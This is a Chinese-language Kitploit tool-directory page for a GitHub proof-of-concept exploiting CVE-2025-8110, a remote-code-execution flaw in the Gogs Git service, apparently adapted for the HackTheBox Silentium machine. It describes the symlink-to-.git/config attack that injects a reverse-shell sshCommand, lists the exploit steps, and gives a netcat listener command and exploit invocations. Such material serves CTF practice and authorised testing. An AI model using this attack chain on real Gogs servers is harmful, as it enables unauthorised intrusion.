Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-8110-Silentium-HTB — CVE-2025-8110 专门针对 HTB 上的 Silentium 盒子。 | Kitploit
工具/GitHubGitHub/hassan-hamadi/cve-2025-8110-silentium-htb
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubhassan-hamadi/cve-2025-8110-silentium-htb

CVE-2025-8110-Silentium-HTB

CVE-2025-8110 专门针对 HTB 上的 Silentium 盒子。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
14个月前尚未审核
分享

CVE-2025-8110 — Gogs RCE PoC(Silentium / HackTheBox)

免责声明: 此工具仅供教育用途及授权渗透测试使用。仅限用于您已获得明确许可的系统。


这是 zAbuQasem/gogs-CVE-2025-8110 的修改版本,已适配针对 HackTheBox 平台上的 Silentium 机器。原始 PoC 需要调整以处理 Silentium 特定的 Gogs 配置和认证流程。


漏洞描述

CVE-2025-8110 是自托管 Git 服务 Gogs 中的一个远程代码执行漏洞。

Gogs 的文件更新 API 端点(PUT /api/v1/repos/.../contents/<file>)未验证目标文件是否为符号链接。经过身份验证的攻击者可以将指向 .git/config 的符号链接推送到仓库中,随后利用该 API 将恶意负载覆盖到该文件上。该负载向 git 配置中注入自定义的 sshCommand,当 Gogs 下次对该仓库执行 SSH 操作时,会在服务端执行该命令,从而导致远程代码执行。


PoC 执行流程

  1. 向 Gogs 进行身份验证,并从登录页面抓取 CSRF 令牌。
  2. 通过用户设置页面生成 Gogs API 令牌。
  3. 通过 API 创建一个启用了 SSH 的新仓库。
  4. 在本地克隆该仓库,植入指向 .git/config 的符号链接(malicious_link -> .git/config),然后推送。
  5. 对符号链接调用文件更新 API,写入包含 sshCommand = <反向shell> 的恶意 .git/config。
  6. Gogs 跟随符号链接,覆盖自身的 .git/config,在下次 SSH 操作时触发 shell。

使用方法

安装依赖:

root@kitploit:~
pip install -r requirements.txt

启动监听器:

root@kitploit:~
nc -lvnp <PORT>

运行漏洞利用:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

可选——通过 Burp Suite 路由:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
下载工具
参数说明
-uGogs 基础 URL
-lh你的攻击机 IP(反向 shell 主机)
-lp你的监听端口
-un你注册的 Gogs 用户名
-pw你的 Gogs 密码
-x(可选)将流量通过 localhost:8080 上的 Burp Suite 路由